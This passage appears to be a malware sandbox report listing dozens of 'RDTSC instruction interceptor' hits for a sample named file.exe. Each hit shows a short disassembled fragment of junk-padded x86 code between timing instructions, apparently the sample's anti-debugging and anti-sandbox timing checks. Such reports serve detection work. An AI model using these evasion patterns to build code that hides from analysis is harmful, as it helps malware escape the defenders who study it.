                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADFD2 second address: 13ADFD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13ADFD8 second address: 13ADFE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8CCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2EC1 second address: 13B2EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2EC9 second address: 13B2EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFD80CDE8CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2EE6 second address: 13B2EEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2EEA second address: 13B2EF4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFD80CDE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B1D5E second address: 13B1D79 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFD80CCF030h 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B1D79 second address: 13B1D96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007EFD80CDE8C6h 0x0000000a jnp 00007EFD80CDE8C6h 0x00000010 ja 00007EFD80CDE8C6h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B1D96 second address: 13B1D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B1D9A second address: 13B1DAF instructions: 0x00000000 rdtsc 0x00000002 jno 00007EFD80CDE8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007EFD80CDE8C8h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B1DAF second address: 13B1DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137A300 second address: 137A347 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D2CECh], eax 0x00000012 lea eax, dword ptr [ebp+1248BFC9h] 0x00000018 mov di, si 0x0000001b nop 0x0000001c jmp 00007EFD80CDE8CCh 0x00000021 push eax 0x00000022 pushad 0x00000023 push edi 0x00000024 push ebx 0x00000025 pop ebx 0x00000026 pop edi 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007EFD80CDE8CAh 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137A347 second address: 135CC76 instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d sub dword ptr [ebp+122D1B33h], eax 0x00000013 mov bh, dh 0x00000015 popad 0x00000016 call dword ptr [ebp+124573BAh] 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007EFD80CCF034h 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137A7B8 second address: 11C1D57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and edi, 63EAC92Dh 0x00000010 push dword ptr [ebp+122D02F5h] 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007EFD80CDE8C8h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000015h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 mov dl, BAh 0x00000032 call dword ptr [ebp+122D21C2h] 0x00000038 pushad 0x00000039 pushad 0x0000003a call 00007EFD80CDE8D9h 0x0000003f push ecx 0x00000040 pop eax 0x00000041 pop ebx 0x00000042 jmp 00007EFD80CDE8D0h 0x00000047 popad 0x00000048 xor eax, eax 0x0000004a mov dword ptr [ebp+122D2D08h], edx 0x00000050 mov edx, dword ptr [esp+28h] 0x00000054 jmp 00007EFD80CDE8D6h 0x00000059 mov dword ptr [ebp+122D2B3Eh], eax 0x0000005f jmp 00007EFD80CDE8D3h 0x00000064 mov esi, 0000003Ch 0x00000069 add dword ptr [ebp+122D2D08h], eax 0x0000006f add esi, dword ptr [esp+24h] 0x00000073 sub dword ptr [ebp+122D2CECh], ebx 0x00000079 lodsw 0x0000007b or dword ptr [ebp+122D3035h], edx 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 sub dword ptr [ebp+122D24D1h], ecx 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f stc 0x00000090 nop 0x00000091 push ebx 0x00000092 push eax 0x00000093 push edx 0x00000094 jp 00007EFD80CDE8C6h 0x0000009a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137A976 second address: 137A984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF02Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137A984 second address: 137A98A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AB0F second address: 137AB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AB13 second address: 137AB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137ABB2 second address: 137ABB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137ABB7 second address: 137ABBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137AE4E second address: 137AE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B627 second address: 137B6B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edx, dword ptr [ebp+12458FDCh] 0x00000012 mov ecx, dword ptr [ebp+122D2A96h] 0x00000018 lea eax, dword ptr [ebp+1248BFC9h] 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007EFD80CDE8C8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 mov edi, dword ptr [ebp+122D17CEh] 0x0000003e nop 0x0000003f jmp 00007EFD80CDE8CEh 0x00000044 push eax 0x00000045 jng 00007EFD80CDE8EAh 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007EFD80CDE8D8h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B6B0 second address: 137B6B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137B6B4 second address: 135D7CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007EFD80CDE8C8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Dh 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 call dword ptr [ebp+122DB9CDh] 0x00000027 jmp 00007EFD80CDE8CBh 0x0000002c pushad 0x0000002d pushad 0x0000002e push edi 0x0000002f pop edi 0x00000030 jmp 00007EFD80CDE8D3h 0x00000035 popad 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D7CF second address: 135D7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D7D3 second address: 135D7D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D7D7 second address: 135D7F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF032h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D7F3 second address: 135D7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2031 second address: 13B2035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2035 second address: 13B204C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B24A2 second address: 13B24A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B2A22 second address: 13B2A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jnc 00007EFD80CDE8CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007EFD80CDE8CBh 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B81DD second address: 13B81FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF037h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B81FA second address: 13B8201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8629 second address: 13B8637 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8637 second address: 13B863B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B863B second address: 13B8641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87B5 second address: 13B87B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87B9 second address: 13B87C3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFD80CCF026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87C3 second address: 13B87C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87C9 second address: 13B87D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF02Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87D9 second address: 13B87DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B87DD second address: 13B880D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007EFD80CCF030h 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 jmp 00007EFD80CCF02Dh 0x00000017 pushad 0x00000018 popad 0x00000019 pop ebx 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B880D second address: 13B8812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8812 second address: 13B881B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8DAC second address: 13B8DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007EFD80CDE8C6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F32 second address: 13B8F49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD80CCF031h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F49 second address: 13B8F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B8F4D second address: 13B8F51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B90F2 second address: 13B9102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9102 second address: 13B9121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007EFD80CCF02Dh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jg 00007EFD80CCF026h 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B9571 second address: 13B9575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BB1F9 second address: 13BB206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007EFD80CCF026h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332E4F second address: 1332E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFD80CDE8C6h 0x0000000a jp 00007EFD80CDE8C6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332E60 second address: 1332E84 instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFD80CCF03Fh 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13BF29C second address: 13BF2B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8CEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007EFD80CDE8C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337FD2 second address: 1337FE6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007EFD80CCF02Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337FE6 second address: 1337FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337FEA second address: 1337FEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1337FEE second address: 133800A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007EFD80CDE8CDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133800A second address: 133800E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339A70 second address: 1339A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 jmp 00007EFD80CDE8D0h 0x0000000e popad 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1A86 second address: 13C1A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1A8C second address: 13C1A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1A90 second address: 13C1A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1CE3 second address: 13C1D18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D2h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007EFD80CDE8D9h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C1D18 second address: 13C1D1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4573 second address: 13C4577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C40B9 second address: 13C40C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007EFD80CCF026h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C40C5 second address: 13C40C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C424D second address: 13C4251 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C4251 second address: 13C4257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C92B2 second address: 13C92F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CCF033h 0x00000009 jmp 00007EFD80CCF030h 0x0000000e popad 0x0000000f jmp 00007EFD80CCF02Dh 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C87CC second address: 13C87E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D1h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C898E second address: 13C899B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFD80CCF026h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C899B second address: 13C89A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8B2A second address: 13C8B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007EFD80CCF026h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8B34 second address: 13C8B4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CDE8D5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8C5A second address: 13C8C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8C5E second address: 13C8C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C8E03 second address: 13C8E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE64D second address: 13CE651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDDE0 second address: 13CDDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDDE5 second address: 13CDDFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFD80CDE8D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDDFA second address: 13CDE10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFD80CCF02Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE30E second address: 13CE32A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD80CDE8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CE32A second address: 13CE342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFD80CCF033h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D42AF second address: 13D42B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2B29 second address: 13D2B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2B2D second address: 13D2B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007EFD80CDE8C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D2DEA second address: 13D2E06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD80CCF034h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D31C4 second address: 13D31CE instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD80CDE8C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D31CE second address: 13D31E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFD80CCF033h 0x0000000d rdtsc
